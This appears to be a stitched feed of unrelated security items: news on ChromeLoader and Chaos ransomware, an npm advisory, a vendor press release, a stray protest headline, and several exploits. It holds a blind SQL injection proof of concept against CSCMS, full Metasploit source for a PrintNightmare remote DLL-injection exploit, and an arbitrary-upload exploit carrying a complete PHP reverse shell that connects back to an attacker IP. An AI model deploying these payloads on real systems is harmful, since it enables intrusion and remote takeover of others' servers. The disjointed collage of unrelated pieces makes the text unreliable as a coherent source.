CSCMS Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the id parameter at /admin.php/user/level_del.

The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows

    POST /admin.php/user/level_del HTTP/1.1
    Host: cscms.test
    Content-Length: 15
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/user/level?v=2012
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=6g124miit249dnkv508bnrsshc8ugiss;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))
    

You can see that success makes the server sleep  
Construct payload to guess the database

(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)

There is blind SQL injection. Because the database name is "cscms", the string returned by select database() starts with 'C', substr ((select + database()), 1,1) = 'C' is true, and the verification is correct

CVE-2022-29687: SQL injection vulnerability exists in Cscms music portal system v4.2 （Discovered by 星海Lab） · Issue #30 · chshcms/cscms

ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?
The post ChromeLoader targets Chrome Browser users with malicious ISO files appeared first on Malwarebytes Labs.

If you’re on the hunt for cracked software or games, be warned. Rogue ISO archive files are looking to infect your systems with ChromeLoader. If you think campaigns such as this only target Windows users, you’d sadly be very much mistaken. The attack sucks in several operating systems and even uses mobiles as bait to draw in additional victims.

**Of PowerShells and ISOs**

An optimal disc image (ISO) is a disk image containing everything written to an optical disc. If someone copied a DVD or CD-ROM, they may end up with an ISO. With the right software, these files can be mounted and read as if the device was reading from a physical disc.

If a malware author claims to be offering cracked or pirated versions of games or software, an ISO is frequently what’s on offer. They may be promoted on social media, video sites, game crack portals, or torrents. Sadly for would-be file downloaders, they’re frequently booby trapped with malware.

PowerShell is a way to automate tasks and comes complete with  a command line interface. It can be used by infection files to execute specific commands and get the infection ball rolling. This ChromeLoader attack combines both Powershell and ISOs to compromise systems.

**How does ChromeLoader infect a device?**

The flow is as follows:

1.  Bogus files are promoted on Twitter and other services. Some victims are simply grabbing the infection from rogue sites and/or torrents.
2.  Some social media posts promote supposedly cracked Android games via QR codes which direct would-be gamers to rogue websites.
3.  Double clicking the ISO file mounts it as a virtual CD-ROM. The executable in the ISO claims to be the content the victim was originally looking for.
4.  ChromeLoader makes use of a PowerShell command to load in a Chrome extension from a remote resource. PowerShell then removes the scheduled task and the victim is none the wiser that their browser has been compromised. At this point, search results cannot be trusted and bogus entries will be displayed to the user.
5.  As BleepingComputer notes, users of macOS are also at risk from this attack. Instead of ISO, attackers use DMG (Apple Disk Image) files, which is a more common format on that OS.

**Tips to avoid ChromeLoader**

1.  Searching for cracked games and software is a very risky business. Many sites promoting malware masquerading as “genuine” crack portals are hard to spot. If you’re downloading a torrent, you may well be rolling dice with regard to the digital health of your devices. Deep sales on games and products are fairly common. Unless it’s a brand new title, it may be worth waiting for a product-centric sale.
2.  In Chrome, Click the **More** icon, then **More Tools** -> **Extensions**. From there, you can see what’s installed, what is active or disabled, along with additional information about all extensions present. Google also has advice for resetting browser settings and additional clean-up methods.
3.  Keeping your security software up to date and running regular scans helps prevent this kind of attack. You should also always scan a downloaded file before making use of it.
4.  Keep in mind that rogue extensions don’t just come from bad websites or rogue downloads. The Chrome web store itself has been known to play host to bad files. Always check reviews, developer information, extension permissions and anything else of note before installing a new extension to your browser.

ChromeLoader targets Chrome Browser users with malicious ISO files

During the protests in Hong Kong, young people carried laser pointers, umbrellas, and plastic ties—objects that sometimes led to their arrest, and years of legal limbo.

‘How Are They Weapons? That’s Only a Flashlight!’

sharp is an application for Node.js image processing. Prior to version 0.30.5, there is a possible vulnerability in logic that is run only at `npm install` time when installing versions of `sharp` prior to the latest v0.30.5. If an attacker has the ability to set the value of the `PKG_CONFIG_PATH` environment variable in a build environment then they might be able to use this to inject an arbitrary command at `npm install` time. This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. This problem is fixed in version 0.30.5.

There's a possible vulnerability in logic that is run only at npm install time when installing versions of sharp prior to the latest v0.30.5.

This is not part of any runtime code, does not affect Windows users at all, and is unlikely to affect anyone that already cares about the security of their build environment. However, out of an abundance of caution, I've created this advisory.

If an attacker has the ability to set the value of the PKG_CONFIG_PATH environment variable in a build environment then they might be able to use this to inject an arbitrary command at npm install time.

I've used the Common Vulnerability Scoring System (CVSS) calculator to determine the maximum possible impact, which suggests a "medium" score of 5.9, but for most people the real impact will be dealing with the noise from automated security tooling that this advisory will bring.

AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C/CR:X/IR:X/AR:X/MAV:X/MAC:X/MPR:X/MUI:R/MS:X/MC:X/MI:X/MA:X

This problem was fixed in commit a6aeef6 and published as part of sharp v0.30.5.

Thank you very much to @dwisiswant0 for the responsible disclosure.

Remember: if an attacker has control over environment variables in your build environment then you have a bigger problem to deal with than this issue.

CVE-2022-29256

New threat hunting and risk identification service provides organizations with an enterprise-wide baseline of their threat landscape and risk exposure.

San Jose, Calif., 24 May 2022 – Forescout Technologies, the leader in automated cybersecurity, today announced the launch of Forescout Frontline, a new threat hunting service utilizing a team of highly-trained cybersecurity analysts to support cybersecurity teams by proactively identifying risks, enabling accelerated incident response, and maturing security posture. Forescout is offering this complimentary service for organizations that lack the internal resources and visibility to defend themselves from cybersecurity attacks, including ransomware and advanced persistent threats (APT).

“Cybersecurity attacks are on the rise. Simultaneously, cybersecurity teams are perennially understaffed and under resourced. This has created a perfect storm,” said Shawn Taylor, vice president of threat defense. “Organizations are under immense pressure to cope with the scale and speed of attacks and the havoc caused by the adversaries. Forescout is launching this new service to help organizations defend against attacks by providing a complete and holistic view of their assets.”

Many organizations use multiple security tools across multiple teams to help identify threats and risks. However, insights may be limited due to siloed views of IT, IoT, IoMT or OT assets. Typically, a variety of these asset types exist across an organization’s digital terrain and are often interconnected, which means cybersecurity risk must be identified and tackled holistically.

Delivered by Forescout Frontline analysts, the Threat Hunting and Risk Identification Service overcomes staffing resources and asset visibility challenges to uncover threats and identify risks that may otherwise remain undiscovered. Forescout Frontline will help organizations:

Discover, validate and prioritize a wide variety of cyber threats and vulnerabilities across all assets, including IT, IoT, IoMT and OT

Analyze the context and risk associated with all findings

Leverage the comprehensive insights to develop effective risk mitigation and remediation strategies

A State of Florida Agency, which supports several key Florida departments, engaged Forescout Frontline to understand each instance of Log4j, a zero-day vulnerability in a popular Java logging framework, across the organization’s 220 sites in 16 diverse divisions. In less than a day and a half, Forescout Frontline delivered insights into thousands of assets with vulnerabilities such as Log4j and Windows-based PrintNightmare. Additionally, hundreds of Critical CVSS-rated vulnerabilities affecting infrastructure devices such as switches and routers were found. Finally, actionable intelligence concerning critical embedded IoT TCP-IP stack-based instances such as NUCLEUS: 13 and RIPPLE 20, insecure communications, and other risks were also discovered. Leveraging this free service shrunk time to mitigation and remediation of these security gaps and improved overall security posture.

“When Log4J broke, we knew it was a critical issue, but we lacked a full picture of the risk within our extended enterprise. The \[Forescout threat hunting\] report was way more thorough than I expected, with in-depth information and actionable intelligence. Not just on Log4j but on other critical vulnerabilities as well, and not just in general terms but exactly where they exist in our environment.” – Information Security Manager, State of Florida Agency

Forescout Frontline levels the cybersecurity playing field by operationalizing the vulnerability research and threat intelligence produced by Forescout’s Vedere Labs and enhancing it with the Forescout Continuum Platform to provide threat hunting services across multiple dimensions. Forescout Frontline analysts include former public sector and private sector threat hunters with training in threat detection and incident response.

To learn more about Forescout Frontline visit here and for further insight into how a State of Florida agency benefitted from this new service visit here.

**About Forescout**

Forescout Technologies, Inc. delivers automated cybersecurity across the digital terrain, maintaining continuous alignment of customers’ security frameworks with their digital realities, including all asset types – IT, OT, IoT, IoMT. The Forescout Continuum Platform provides complete asset visibility, continuous compliance, network segmentation and a strong foundation for Zero Trust. For more than 20 years, Fortune 100 organizations and government agencies have trusted Forescout to provide automated cybersecurity at scale. Forescout arms customers with data-powered intelligence to accurately detect risks and quickly remediate cyberthreats without disruption of critical business assets.

Managing cyber risk, together.

Forescout Launches Forescout Frontline to Help Organizations Tackle Ransomware and Real Time Threats

The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN vector which requires the Print Spooler service to be running.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'windows_error'require 'ruby_smb'require 'ruby_smb/error'class MetasploitModule < Msf::Exploit::Remote  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::DCERPC  include Msf::Exploit::Remote::SMB::Client::Authenticated  include Msf::Exploit::Remote::SMB::Server::Share  include Msf::Exploit::Retry  include Msf::Exploit::EXE  include Msf::Exploit::Deprecated  moved_from 'auxiliary/admin/dcerpc/cve_2021_1675_printnightmare'  PrintSystem = RubySMB::Dcerpc::PrintSystem  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Print Spooler Remote DLL Injection',        'Description' => %q{          The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted          DCERPC request, resulting in remote code execution as NT AUTHORITY\SYSTEM. This module uses the MS-RPRN          vector which requires the Print Spooler service to be running.        },        'Author' => [          'Zhiniang Peng',           # vulnerability discovery / research          'Xuefeng Li',              # vulnerability discovery / research          'Zhipeng Huo',             # vulnerability discovery          'Piotr Madej',             # vulnerability discovery          'Zhang Yunhai',            # vulnerability discovery          'cube0x0',                 # PoC          'Spencer McIntyre',        # metasploit module          'Christophe De La Fuente', # metasploit module co-author        ],        'License' => MSF_LICENSE,        'DefaultOptions' => {          'SRVHOST' => Rex::Socket.source_address        },        'Stance' => Msf::Exploit::Stance::Aggressive,        'Targets' => [          [            'Windows', {              'Platform' => 'win',              'Arch' => [ ARCH_X64, ARCH_X86 ]            },          ],        ],        'DisclosureDate' => '2021-06-08',        'References' => [          ['CVE', '2021-1675'],          ['CVE', '2021-34527'],          ['URL', 'https://github.com/cube0x0/CVE-2021-1675'],          ['URL', 'https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare'],          ['URL', 'https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1'],          ['URL', 'https://github.com/byt3bl33d3r/ItWasAllADream']        ],        'Notes' => {          'AKA' => [ 'PrintNightmare' ],          'Stability' => [CRASH_SERVICE_DOWN],          'Reliability' => [UNRELIABLE_SESSION],          'SideEffects' => [            ARTIFACTS_ON_DISK # the dll will be copied to the remote server          ]        }      )    )    register_advanced_options(      [        OptInt.new('ReconnectTimeout', [ true, 'The timeout in seconds for reconnecting to the named pipe', 10 ])      ]    )    deregister_options('AutoCheck')  end  def check    begin      connect(backend: :ruby_smb)    rescue Rex::ConnectionError      return Exploit::CheckCode::Unknown('Failed to connect to the remote service.')    end    begin      smb_login    rescue Rex::Proto::SMB::Exceptions::LoginError      return Exploit::CheckCode::Unknown('Failed to authenticate to the remote service.')    end    begin      dcerpc_bind_spoolss    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      if nt_status == ::WindowsError::NTStatus::STATUS_OBJECT_NAME_NOT_FOUND        print_error("The 'Print Spooler' service is disabled.")      end      return Exploit::CheckCode::Safe("The DCERPC bind failed with error #{nt_status.name} (#{nt_status.description}).")    end    @target_arch = dcerpc_getarch    # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/e81cbc09-ab05-4a32-ae4a-8ec57b436c43    if @target_arch == ARCH_X64      @environment = 'Windows x64'    elsif @target_arch == ARCH_X86      @environment = 'Windows NT x86'    else      return Exploit::CheckCode::Detected('Successfully bound to the remote service.')    end    print_status("Target environment: Windows v#{simple.client.os_version} (#{@target_arch})")    print_status('Enumerating the installed printer drivers...')    drivers = enum_printer_drivers(@environment)    @driver_path = "#{drivers.driver_path.rpartition('\\').first}\\UNIDRV.DLL"    vprint_status("Using driver path: #{@driver_path}")    print_status('Retrieving the path of the printer driver directory...')    @config_directory = get_printer_driver_directory(@environment)    vprint_status("Using driver directory: #{@config_directory}") unless @config_directory.nil?    container = driver_container(      p_config_file: 'C:\\Windows\\System32\\kernel32.dll',      p_data_file: "\\??\\UNC\\127.0.0.1\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.dll"    )    case add_printer_driver_ex(container)    when nil # prevent the module from erroring out in case the response can't be mapped to a Win32 error code      return Exploit::CheckCode::Unknown('Received unknown status code, implying the target is not vulnerable.')    when ::WindowsError::Win32::ERROR_PATH_NOT_FOUND      return Exploit::CheckCode::Vulnerable('Received ERROR_PATH_NOT_FOUND, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_BAD_NET_NAME      return Exploit::CheckCode::Vulnerable('Received ERROR_BAD_NET_NAME, implying the target is vulnerable.')    when ::WindowsError::Win32::ERROR_ACCESS_DENIED      return Exploit::CheckCode::Safe('Received ERROR_ACCESS_DENIED implying the target is patched.')    end    Exploit::CheckCode::Detected('Successfully bound to the remote service.')  end  def run    fail_with(Failure::BadConfig, 'Can not use an x64 payload on an x86 target.') if @target_arch == ARCH_X86 && payload.arch.first == ARCH_X64    fail_with(Failure::NoTarget, 'Only x86 and x64 targets are supported.') if @environment.nil?    fail_with(Failure::Unknown, 'Failed to enumerate the driver directory.') if @config_directory.nil?    super  end  def setup    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')    end    super  end  def start_service    file_name << '.dll'    self.file_contents = generate_payload_dll    super  end  def primer    dll_path = unc    if dll_path =~ /^\\\\([\w:.\[\]]+)\\(.*)$/      # targets patched for CVE-2021-34527 (but with Point and Print enabled) need to use this path style as a bypass      # otherwise the operation will fail with ERROR_INVALID_PARAMETER      dll_path = "\\??\\UNC\\#{Regexp.last_match(1)}\\#{Regexp.last_match(2)}"    end    vprint_status("Using DLL path: #{dll_path}")    filename = dll_path.rpartition('\\').last    container = driver_container(p_config_file: 'C:\\Windows\\System32\\kernel32.dll', p_data_file: dll_path)    3.times do      add_printer_driver_ex(container)    end    1.upto(3) do |directory|      container.driver_info.p_config_file.assign("#{@config_directory}\\3\\old\\#{directory}\\#{filename}")      break if add_printer_driver_ex(container).nil?    end    cleanup_service  end  def driver_container(**kwargs)    PrintSystem::DriverContainer.new(      level: 2,      tag: 2,      driver_info: PrintSystem::DriverInfo2.new(        c_version: 3,        p_name_ref_id: 0x00020000,        p_environment_ref_id: 0x00020004,        p_driver_path_ref_id: 0x00020008,        p_data_file_ref_id: 0x0002000c,        p_config_file_ref_id: 0x00020010,        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913        p_name: "#{Rex::Text.rand_text_alpha_upper(2..4)} #{Rex::Text.rand_text_numeric(2..3)}",        p_environment: @environment,        p_driver_path: @driver_path,        **kwargs      )    )  end  def dcerpc_bind_spoolss    handle = dcerpc_handle(PrintSystem::UUID, '1.0', 'ncacn_np', ['\\spoolss'])    vprint_status("Binding to #{handle} ...")    dcerpc_bind(handle)    vprint_status("Bound to #{handle} ...")  end  def enum_printer_drivers(environment)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2)    response = rprn_call('RpcEnumPrinterDrivers', p_environment: environment, level: 2, p_drivers: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to enumerate printer drivers.') unless response.p_drivers&.length    DriverInfo2.read(response.p_drivers.map(&:chr).join)  end  def get_printer_driver_directory(environment)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2)    response = rprn_call('RpcGetPrinterDriverDirectory', p_environment: environment, level: 2, p_driver_directory: [0] * response.pcb_needed, cb_buf: response.pcb_needed)    fail_with(Failure::UnexpectedReply, 'Failed to obtain the printer driver directory.') unless response.p_driver_directory&.length    RubySMB::Field::Stringz16.read(response.p_driver_directory.map(&:chr).join).encode('ASCII-8BIT')  end  def add_printer_driver_ex(container)    flags = PrintSystem::APD_INSTALL_WARNED_DRIVER | PrintSystem::APD_COPY_FROM_DIRECTORY | PrintSystem::APD_COPY_ALL_FILES    begin      response = rprn_call('RpcAddPrinterDriverEx', p_name: "\\\\#{datastore['RHOST']}", p_driver_container: container, dw_file_copy_flags: flags)    rescue RubySMB::Error::UnexpectedStatusCode => e      nt_status = ::WindowsError::NTStatus.find_by_retval(e.status_code.value).first      message = "Error #{nt_status.name} (#{nt_status.description})"      if nt_status == ::WindowsError::NTStatus::STATUS_PIPE_BROKEN        # STATUS_PIPE_BROKEN is the return value when the payload is executed, so this is somewhat expected        print_status('The named pipe connection was broken, reconnecting...')        reconnected = retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do          dcerpc_bind_spoolss        rescue RubySMB::Error::CommunicationError, RubySMB::Error::UnexpectedStatusCode => e          false        else          true        end        unless reconnected          vprint_status('Failed to reconnect to the named pipe.')          return nil        end        print_status('Successfully reconnected to the named pipe.')        retry      else        print_error(message)      end      return nt_status    end    error = ::WindowsError::Win32.find_by_retval(response.error_status.value).first    message = "RpcAddPrinterDriverEx response #{response.error_status}"    message << " #{error.name} (#{error.description})" unless error.nil?    vprint_status(message)    error  end  def rprn_call(name, **kwargs)    request = PrintSystem.const_get("#{name}Request").new(**kwargs)    begin      raw_response = dcerpc.call(request.opnum, request.to_binary_s)    rescue Rex::Proto::DCERPC::Exceptions::Fault => e      fail_with(Failure::UnexpectedReply, "The #{name} Print System RPC request failed (#{e.message}).")    end    PrintSystem.const_get("#{name}Response").read(raw_response)  end  class DriverInfo2Header < BinData::Record    endian :little    uint32     :c_version    uint32     :name_offset    uint32     :environment_offset    uint32     :driver_path_offset    uint32     :data_file_offset    uint32     :config_file_offset  end  # this is a partial implementation that just parses the data, this is *not* the same struct as PrintSystem::DriverInfo2  # see: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/2825d22e-c5a5-47cd-a216-3e903fd6e030  DriverInfo2 = Struct.new(:header, :name, :environment, :driver_path, :data_file, :config_file) do    def self.read(data)      header = DriverInfo2Header.read(data)      new(        header,        RubySMB::Field::Stringz16.read(data[header.name_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.environment_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.driver_path_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.data_file_offset..]).encode('ASCII-8BIT'),        RubySMB::Field::Stringz16.read(data[header.config_file_offset..]).encode('ASCII-8BIT')      )    end  endend

Print Spooler Remote DLL Injection

A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.

A slip-up by a malware author has allowed researchers to taxonomize three ransomware variations going by different names.

For a year now, threat actors have been using different versions of the same ransomware builder – “Chaos” – to attack governments, corporations and healthcare facilities. Now researchers from Blackberry have connected the dots, painting a picture of a malware that has evolved five times in twelve months.

“The clues surfaced during a discussion between a recent victim and the threat group behind Onyx ransomware, taking place on the threat actor’s leak site,” the researchers noted in a new report. The Onyx ransomware group were threatening to publish said victim’s data to the internet when, in soap opera fashion, a third party entered the chat stating:

“Hello… this is my very old version of ransomware… I updated many thing and it is faster decryptable… there is no limit in new version…”

Onyx was, evidently, just an outdated Chaos build. The proclaimed author of Chaos kindly offered the Onyx group their newest version of Chaos, renamed “Yashma.”

In case you’ve already lost track, let’s break it down:

**Chaos Started as a Scam**

“The Chaos author’s apparent intent of ‘outing’ Onyx as a copycat is particularly ironic,” the researchers wrote, “given the origins of Chaos.”

The first version of Chaos began to make rounds on the dark web in June, 2021. Named “Ryuk .Net Ransomware Builder v1.0,” it was marketed as a builder for the famous Ryuk ransomware family. It even sported Ryuk branding on its user interface.

Being associated with such a big name yielded attention from reverse-engineers, cybersecurity researchers and cybercriminals alike. But nobody could find any real links between this builder and the real Ryuk ransomware, or the Wizard Spider group behind it. Clearly Ryuk .Net Ransomware Builder v1.0 was a fraud, and “the response to this ham-handed tactic was so negative,” noted Blackberry’s researchers, that “it prompted the threat’s creator to drop the Ryuk pretense and quickly rebrand its new creation as ‘Chaos.'”

**How Chaos Has Evolved**

Shortly after its rebrand, the author behind Chaos worked to distinguish their builder. Chaos 2.0 was “more refined” than its initial version, “generating more advanced ransomware samples” that could:

*   Delete shadow copies
*   Delete backup catalogs
*   Disable Windows recovery mode

But Chaos was still more a destructor than a ransomware, because it lacked any mechanism for file recovery, even if a ransom was paid. That bug was fixed less than a month later, in Chaos version 3.0.

The next upgrade, 4.0, was in the wild for months before it gained notoriety in April, 2022, thanks to the ransomware group “Onyx.” Onyx would infiltrate enterprise networks, steal valuable data, then drop their “Onyx ransomware.” This malware was really just a knock-off of Chaos 4.0, though. When Blackberry analyzed samples of both, they found a 98% overlap.

Link Found Connecting Chaos, Onyx and Yashma Ransomware

An arbitrary file upload vulnerability in the Select Image function of Online Food Ordering System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

\# Online Food Ordering System Unrestricted File Upload + Remote Code Execution \* Exploit Date: 4/18/2022 \* Exploit Author: Nguyen Phu Hung (d4rkp0w4r) # Exploit \* Step => Login to admin -> \`Categoty\` -> \`Add Categoty\` -> \`Upload malicious file\` \* Injection Point => \`Select Image\` !\[\](https://i.imgur.com/LHML1T2.png) \* Use netcat listen web shell \`\`\`python= nc.exe -vv -l -p 9999 \`\`\` \* Log out admin page or stayed, web shell direct connected !!! !\[\](https://i.imgur.com/Kkz3kQc.png) # POC \* Request \`\`\`python= POST /online-food-order/admin/add-category.php HTTP/1.1 Host: 192.168.1.101:8888 Content-Length: 9853 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101:8888 Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydqHz7jzGYIN0VWy4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101:8888/online-food-order/admin/add-category.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: \_lang=en; PHPSESSID=hpgbm1opdd0qcqb5f73jvpr4ia Connection: close ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="title" Hacked ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="image"; filename="nc.php" Content-Type: application/octet-stream <?php class Shell { private $addr = null; private $port = null; private $os = null; private $shell = null; private $descriptorspec = array( 0 => array('pipe', 'r'), // shell can read from STDIN 1 => array('pipe', 'w'), // shell can write to STDOUT 2 => array('pipe', 'w') // shell can write to STDERR ); private $buffer = 1024; // read/write buffer size private $clen = 0; // command length private $error = false; // stream read/write error public function \_\_construct($addr, $port) { $this->addr = $addr; $this->port = $port; } private function detect() { $detected = true; if (stripos(PHP\_OS, 'LINUX') !== false) { // same for macOS $this->os = 'LINUX'; $this->shell = '/bin/sh'; } else if (stripos(PHP\_OS, 'WIN32') !== false || stripos(PHP\_OS, 'WINNT') !== false || stripos(PHP\_OS, 'WINDOWS') !== false) { $this->os = 'WINDOWS'; $this->shell = 'cmd.exe'; } else { $detected = false; echo "SYS\_ERROR: Underlying operating system is not supported, script will now exit...\\n"; } return $detected; } private function daemonize() { $exit = false; if (!function\_exists('pcntl\_fork')) { echo "DAEMONIZE: pcntl\_fork() does not exists, moving on...\\n"; } else if (($pid = @pcntl\_fork()) < 0) { echo "DAEMONIZE: Cannot fork off the parent process, moving on...\\n"; } else if ($pid > 0) { $exit = true; echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\\n"; } else if (posix\_setsid() < 0) { // once daemonized you will actually no longer see the script's dump echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\\n"; } else { echo "DAEMONIZE: Completed successfully!\\n"; } return $exit; } private function settings() { @error\_reporting(0); @set\_time\_limit(0); // do not impose the script execution time limit @umask(0); // set the file/directory permissions - 666 for files and 777 for directories } private function dump($data) { $data = str\_replace('<', '&lt;', $data); $data = str\_replace('>', '&gt;', $data); echo $data; } private function read($stream, $name, $buffer) { if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot read from ${name}, script will now exit...\\n"; } return $data; } private function write($stream, $name, $data) { if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream $this->error = true; // set global error flag echo "STRM\_ERROR: Cannot write to ${name}, script will now exit...\\n"; } return $bytes; } // read/write method for non-blocking streams private function rw($input, $output, $iname, $oname) { while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) { if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length $this->dump($data); // script's dump } } // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS) // we must read the exact byte length from a stream and not a single byte more private function brw($input, $output, $iname, $oname) { $fstat = fstat($input); $size = $fstat\['size'\]; if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) { // for some reason Windows OS pipes STDIN into STDOUT // we do not like that // we need to discard the data from the stream while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) { $this->clen -= $bytes; $size -= $bytes; } } while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) { $size -= $bytes; $this->dump($data); // script's dump } } public function run() { if ($this->detect() && !$this->daemonize()) { $this->settings(); // ----- SOCKET BEGIN ----- $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30); if (!$socket) { echo "SOC\_ERROR: {$errno}: {$errstr}\\n"; } else { stream\_set\_blocking($socket, false); // set the socket stream to non-blocking mode | returns 'true' on Windows OS // ----- SHELL BEGIN ----- $process = @proc\_open($this->shell, $this->descriptorspec, $pipes, null, null); if (!$process) { echo "PROC\_ERROR: Cannot start the shell\\n"; } else { foreach ($pipes as $pipe) { stream\_set\_blocking($pipe, false); // set the shell streams to non-blocking mode | returns 'false' on Windows OS } // ----- WORK BEGIN ----- $status = proc\_get\_status($process); @fwrite($socket, "SOCKET: Shell has connected! PID: " . $status\['pid'\] . "\\n"); do { $status = proc\_get\_status($process); if (feof($socket)) { // check for end-of-file on SOCKET echo "SOC\_ERROR: Shell connection has been terminated\\n"; break; } else if (feof($pipes\[1\]) || !$status\['running'\]) { // check for end-of-file on STDOUT or if process is still running echo "PROC\_ERROR: Shell process has been terminated\\n"; break; // feof() does not work with blocking streams } // use proc\_get\_status() instead $streams = array( 'read' => array($socket, $pipes\[1\], $pipes\[2\]), // SOCKET | STDOUT | STDERR 'write' => null, 'except' => null ); $num\_changed\_streams = @stream\_select($streams\['read'\], $streams\['write'\], $streams\['except'\], 0); // wait for stream changes | will not wait on Windows OS if ($num\_changed\_streams === false) { echo "STRM\_ERROR: stream\_select() failed\\n"; break; } else if ($num\_changed\_streams > 0) { if ($this->os === 'LINUX') { if (in\_array($socket , $streams\['read'\])) { $this->rw($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (in\_array($pipes\[2\], $streams\['read'\])) { $this->rw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (in\_array($pipes\[1\], $streams\['read'\])) { $this->rw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } else if ($this->os === 'WINDOWS') { // order is important if (in\_array($socket, $streams\['read'\])/\*------\*/) { $this->rw ($socket , $pipes\[0\], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN if (($fstat = fstat($pipes\[2\])) && $fstat\['size'\]) { $this->brw($pipes\[2\], $socket , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET if (($fstat = fstat($pipes\[1\])) && $fstat\['size'\]) { $this->brw($pipes\[1\], $socket , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET } } } while (!$this->error); // ------ WORK END ------ foreach ($pipes as $pipe) { fclose($pipe); } proc\_close($process); } // ------ SHELL END ------ fclose($socket); } // ------ SOCKET END ------ } } } echo '<pre>'; // change the host address and/or port number as necessary $sh = new Shell('192.168.1.101', 9999); $sh->run(); unset($sh); // garbage collector requires PHP v5.3.0 or greater // @gc\_collect\_cycles(); echo '</pre>'; ?> ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="featured" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="active" Yes ------WebKitFormBoundarydqHz7jzGYIN0VWy4 Content-Disposition: form-data; name="submit" Add Category ------WebKitFormBoundarydqHz7jzGYIN0VWy4-- \`\`\`

CVE-2022-29651: Online Food Ordering System Unrestricted File Upload + Remote Code Execution - HackMD

